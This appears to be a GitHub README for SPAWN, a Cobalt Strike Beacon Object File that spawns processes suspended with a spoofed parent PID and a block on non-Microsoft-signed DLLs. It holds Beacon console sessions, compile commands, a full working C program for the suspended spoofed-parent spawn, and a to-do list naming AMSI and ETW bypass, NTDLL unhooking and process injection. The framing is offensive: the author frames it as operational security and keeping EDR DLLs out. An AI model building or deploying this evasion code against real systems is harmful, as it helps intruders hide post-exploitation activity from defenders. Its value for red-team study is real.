qqvirus / SPAWN

Cobalt Strike Beacon Object File (BOF) that takes the name of a PE file as an argument and spawns the process in a suspended state

SPAWN - Cobalt Strike BOF

Beacon Object File (BOF) that spawns an arbitrary process from Beacon's memory. Supports Parent Process ID (PPID) spoofing and blocking non-Microsoft-signed DLLs from loading into the spawned process's memory (which keeps some EDR DLLs out).

New Features (07/19/2021)

  • CNA Aggressor Script interface
  • PPID spoofing
  • Cobalt Strike "like" blockdll functionality

Example session from the Beacon console, spawning cmd.exe under OneDrive.exe (PID 8264):

    beacon> help
        spawn                     Spawn a process with a spoofed PPID and blockDll
    beacon> help spawn
    Synopsis: spawn /path/to/exe PPID
    beacon> ps
    8264  5536  OneDrive.exe                 x86   1           DESKTOP-KOSR2NO\boku
    beacon> spawn cmd.exe 8264
    [*] SPAWN (@0xBoku|github.com/boku7)
    Opened handle 0x634 to process 8264(PID)
    Success! Spawned process: cmd.exe | PID: 5384 | PPID: 8264

Compile with x64 MinGW:

x86_64-w64-mingw32-gcc -c spawnSuspendedProcess.c -o spawnSuspendedProcess.o

Run from the Cobalt Strike Beacon console

  • After compiling, load spawn.cna through Cobalt Strike's Script Manager, then run:

    beacon> spawn /path/to/exe PPID

To Do List

  • Aggressor script for a better end-user experience (done)
  • PPID spoofing for better parent-child process relationship OPSEC (done)
    • In the session above, the cmd.exe process is spawned with OneDrive.exe (PID 8264) as its parent
  • Cobalt Strike-style blockdll functionality to prevent non-Microsoft-signed DLLs from loading into the spawned process's memory (done)
    • The spawned process shows the spoofed parent-child relationship and is created with the "Signatures restricted (Microsoft only)" mitigation
    • "Signatures restricted (Microsoft only)" means DLLs not signed by Microsoft cannot be loaded into the spawned process
  • Do not crash the Beacon process when the PE file does not exist (done)
    • No longer crashes on process creation failure
  • Return the PID to the Cobalt Strike console when the new process is spawned (done; see the session above)
  • Build out different methods of remote process injection
  • Build out different methods of remote process patching
    • NTDLL.DLL unhooking in the remote process
    • ETW patching/bypass in the remote process
    • AMSI patching/bypass in the remote process
    • CLR loading and .NET assembly injection
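The three mechanisms the list above relies on (a suspended spawn, a spoofed parent, and the "Signatures restricted (Microsoft only)" mitigation) all go through one CreateProcess call with an extended attribute list. The program below is an added example, not the SPAWN BOF's own source: it is a standalone Win32 console program rather than a BOF (a real BOF would resolve these APIs with Dynamic Function Resolution and print through the Beacon API, which is left out here), and the names parse_ppid and spawn_suspended are my own. It uses PROC_THREAD_ATTRIBUTE_PARENT_PROCESS for the spoofed parent and PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON for the blockdll-like behaviour, and it reports a missing PE as a Win32 error instead of crashing.

```c
/* spawn_demo.c: added example (not the SPAWN BOF's code) of a suspended spawn
 * with a spoofed PPID and the block-non-Microsoft-DLL mitigation.
 * Build: x86_64-w64-mingw32-gcc spawn_demo.c -o spawn_demo.exe */
#define _WIN32_WINNT 0x0A00
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse the PPID argument of "spawn /path/to/exe PPID": a positive decimal
 * integer, no sign, no trailing junk. Returns 0 on success, -1 on error. */
int parse_ppid(const char *s, unsigned long *ppid_out)
{
    char *end = NULL;
    unsigned long v;
    if (s == NULL || *s < '0' || *s > '9') return -1;
    errno = 0;
    v = strtoul(s, &end, 10);
    if (errno != 0 || *end != '\0' || v == 0 || v == ULONG_MAX) return -1;
    *ppid_out = v;
    return 0;
}

#ifdef _WIN32
#include <windows.h>
#ifndef PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON
#define PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON (0x00001000ULL << 32)
#endif

/* Create `image` suspended with `ppid` as its apparent parent and, when
 * block_non_ms is set, the "Signatures restricted (Microsoft only)" policy.
 * Returns ERROR_SUCCESS and fills *pi (caller owns the handles), or a Win32
 * error code; a missing PE gives ERROR_FILE_NOT_FOUND rather than a crash. */
DWORD spawn_suspended(const char *image, DWORD ppid, int block_non_ms,
                      PROCESS_INFORMATION *pi)
{
    STARTUPINFOEXA si;
    SIZE_T attr_size = 0;
    HANDLE parent;
    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    DWORD err = ERROR_SUCCESS;
    int attrs_ready = 0;
    char cmdline[MAX_PATH];   /* CreateProcessA may write to the command line */

    ZeroMemory(&si, sizeof(si));
    si.StartupInfo.cb = sizeof(si);
    ZeroMemory(pi, sizeof(*pi));
    if (strlen(image) >= sizeof(cmdline)) return ERROR_BAD_LENGTH;
    strcpy(cmdline, image);

    /* PROCESS_CREATE_PROCESS is the access right needed on the fake parent. */
    parent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, ppid);
    if (parent == NULL) return GetLastError();

    /* Size, allocate and initialise room for two attributes. */
    InitializeProcThreadAttributeList(NULL, 2, 0, &attr_size);
    si.lpAttributeList = HeapAlloc(GetProcessHeap(), 0, attr_size);
    if (si.lpAttributeList == NULL) { err = ERROR_NOT_ENOUGH_MEMORY; goto done; }
    if (!InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &attr_size)) {
        err = GetLastError(); goto done;
    }
    attrs_ready = 1;
    if (!UpdateProcThreadAttribute(si.lpAttributeList, 0,
            PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parent, sizeof(parent), NULL, NULL) ||
        (block_non_ms && !UpdateProcThreadAttribute(si.lpAttributeList, 0,
            PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(policy), NULL, NULL))) {
        err = GetLastError(); goto done;
    }
    if (!CreateProcessA(NULL, cmdline, NULL, NULL, FALSE,
            EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED,
            NULL, NULL, &si.StartupInfo, pi))
        err = GetLastError();
done:
    if (attrs_ready) DeleteProcThreadAttributeList(si.lpAttributeList);
    if (si.lpAttributeList) HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    CloseHandle(parent);
    return err;
}

int main(int argc, char **argv)
{
    unsigned long ppid;
    PROCESS_INFORMATION pi;
    DWORD err;
    if (argc != 3 || parse_ppid(argv[2], &ppid) != 0) {
        fprintf(stderr, "usage: %s <path\\to\\exe> <PPID>\n", argv[0]);
        return 1;
    }
    err = spawn_suspended(argv[1], (DWORD)ppid, 1, &pi);
    if (err != ERROR_SUCCESS) {
        fprintf(stderr, "spawn failed: Win32 error %lu\n", (unsigned long)err);
        return 1;
    }
    printf("Spawned %s | PID: %lu | PPID: %lu (suspended)\n",
           argv[1], (unsigned long)pi.dwProcessId, ppid);
    ResumeThread(pi.hThread);   /* a BOF would inject first; the demo just resumes */
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}
#else
int main(void) { fputs("Win32 only (parse_ppid is portable)\n", stderr); return 1; }
#endif
```

Run it as `spawn_demo.exe cmd.exe 8264` from an account that can open PID 8264 with PROCESS_CREATE_PROCESS; the child sits suspended until ResumeThread, which is the window an early-bird injection would use. The mitigation only rejects image loads that are not Microsoft-signed, so it does nothing against kernel-side EDR visibility of the process creation itself.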

Why did I build this?

1. To learn more about Cobalt Strike BOFs
2. I want flexibility in choosing my sacrificial processes.
  • Spawning the same process for every fork-and-run seems like bad/predictable OPSEC to me.
  • There are probably methods for this out there or built into CS already. Either way, I wanted to build my own.
3. I have a lot of cool BOF ideas that I want to build on this.

Credits / References

PPID Spoofing & blockDll functionality
  • Raphael Mudge - Beacon Object Files - Luser Demo
  • Cobalt Strike - Beacon Object Files
BOF Code References
  • anthemtotheego/InlineExecute-Assembly
  • ajpc500/BOFs
  • trustedsec/CS-Situational-Awareness-BOF
  • Sektor7 Malware Dev Essentials course - learned how to do the early bird injection technique
